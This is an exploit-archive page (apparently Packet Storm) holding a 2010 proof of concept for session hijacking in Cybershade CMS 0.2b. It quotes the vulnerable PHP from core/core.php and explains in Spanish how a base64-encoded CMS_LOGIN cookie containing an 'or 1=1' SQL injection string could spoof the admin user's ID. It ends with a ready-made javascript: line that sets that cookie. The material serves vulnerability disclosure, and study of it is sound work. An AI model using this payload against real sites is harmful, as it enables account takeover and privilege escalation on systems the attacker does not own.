exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cybershade CMS 0.2b Session Hijacking

Cybershade CMS 0.2b Session Hijacking
Posted Feb 26, 2010
Authored by JosS | Site spanish-hackers.com

Cybershade CMS version 0.2b suffers from a session hijacking vulnerability.

tags | exploit
SHA-256 | 14ce583c55a5ed3d19649a70c7bb7cfc53a20fa68723a78e98b09df1170420f2

Cybershade CMS 0.2b Session Hijacking

Change Mirror Download
# p0c!: Session Hijacking
#################################################################################################
# Cybershade CMS 0.2b Session Hijacking PoC Vulnerability
# url: http://sourceforge.net/projects/cybershadecms/
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
#################################################################################################
#
#
# code vuln!: [core/core.php]
# line 18: $CMS_ip = htmlspecialchars($_SERVER['REMOTE_ADDR']);
# ...
# line 27: if (isset($_COOKIE['CMS_LOGIN']) && (!isset($_SESSION['CMS_user']))){
# $cookie = base64_decode($_COOKIE['CMS_LOGIN']);
# $CMS_COOKIE = explode(':', $cookie);
# $c_id = substr($CMS_COOKIE[0], 9);
# $c_acode = substr($CMS_COOKIE[1], 0, 6);
# $auto_login = sql_query(users, autologin, "WHERE id='".$c_id."'");
# $acode = sql_query(users, usercode, "WHERE id='".$c_id."'");
# $ip = sql_query(users, userip, "WHERE id='".$c_id."'");
# line 35: if (($auto_login == 1) && ($c_acode == $acode) && ($CMS_ip == $ip)){
# $_SESSION['CMS_user'] = sql_query(users, username, "WHERE id='".$c_id."'");
# $_SESSION['CMS_priv'] = sql_query(users, rights, "WHERE id='".$c_id."'");
# }}
#
#################################################################################################
#
#
# Debo decir que en este documento no mostrare la forma exacta
# para poder realizar un ataque con exito utilizando este modo.
# Ya que como su propio titulo indica es una __Prueba de Concepto__.
# La vulnerabilidad nos permite escalar privilegios mediante cookie spoofing.
#
#
# Analizando el codigo:
#
# Linea 27: Comprueba la existencia de la Cookie "CMS_LOGIN" y que no haya
# ninguna sesion ya definida.
# Linea 28: Realiza un decode en base64 al valor de la Cookie "CMS_LOGIN"
# por lo que esta debera estar encode Base64.
# Linea 29: Divide la Cookie en dos partes usando como limitador ":",
# colocando cada parte en $CMS_COOKIE[0] y $CMS_COOKIE[1].
# Linea 30: Coloca en $c_id el contenido restante a los 9 caracteres
# principales de $CMS_COOKIE[0].
# Linea 31: Coloca en $c_acode los 6 primeros caracteres de $CMS_COOKIE[1].
# Linea 32: Mira si el usuario a comprobado el auto_ingreso.
# Linea 33: Obtiene los datos almacenados en "usercode".
# Linea 34: Obtiene la IP asignada a dicho usuario.
# Linra 35: Hace varias comprobaciones con IF antes de escalar los privilegios.
#
# /------------------/
#
# Podriamos basar nuestro ataque en una inyeccion de este tipo:
# Inyeccion: basuraaaa1:222222baruraaaaaa
#
# Donde '1' pondriamos el ID del usuario al que queremos escalar privilegos,
# en este caso si es el administrador se da por sabadio que es '1'. Lo demas
# es basura, condicion puesta con la funcion substr.
#
# Donde '2' tendriamos que introducir una sentencia que nos permitiese
# igualar ($c_acode == $acode), como bien indica la sentencia IF de la linea 35.
# Talvez buscar la igualdad logica apropiada sea la parte mas dificil del ataque,
# pero como estamos trabando un ataque de inyecciones SQL ... or 1=1.
#
# Ejemplo de Inyeccion: basuraaaa1:or 1=1baruraaaaaa
#
# Si todo sale bien, deberiamos escalar los privilegios hacia el usuario que
# indicamos en el ID de la inyeccion.
#
#
# Codigo de concepto:
#
# <?PHP
# $login="YmFzdXJhYWFhMTpvciAxPTFiYXJ1cmFhYWFhYQ=="; // basuraaaa1:or 1=1baruraaaaaa
# $cookie = base64_decode($login);
# $CMS_COOKIE = explode(':', $cookie);
# $c_id = substr($CMS_COOKIE[0], 9);
# $c_acode = substr($CMS_COOKIE[1], 0, 6);
#
# echo "$c_id\n";
# echo $c_acode;
# ?>
#################################################################################################
# Possible SQL injection? I think so
#################################################################################################


p0c!: javascript:document.cookie = "CMS_LOGIN=YmFzdXJhYWFhMTpvciAxPTFiYXJ1cmFhYWFhYQ==; path=/";

# __h0__
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close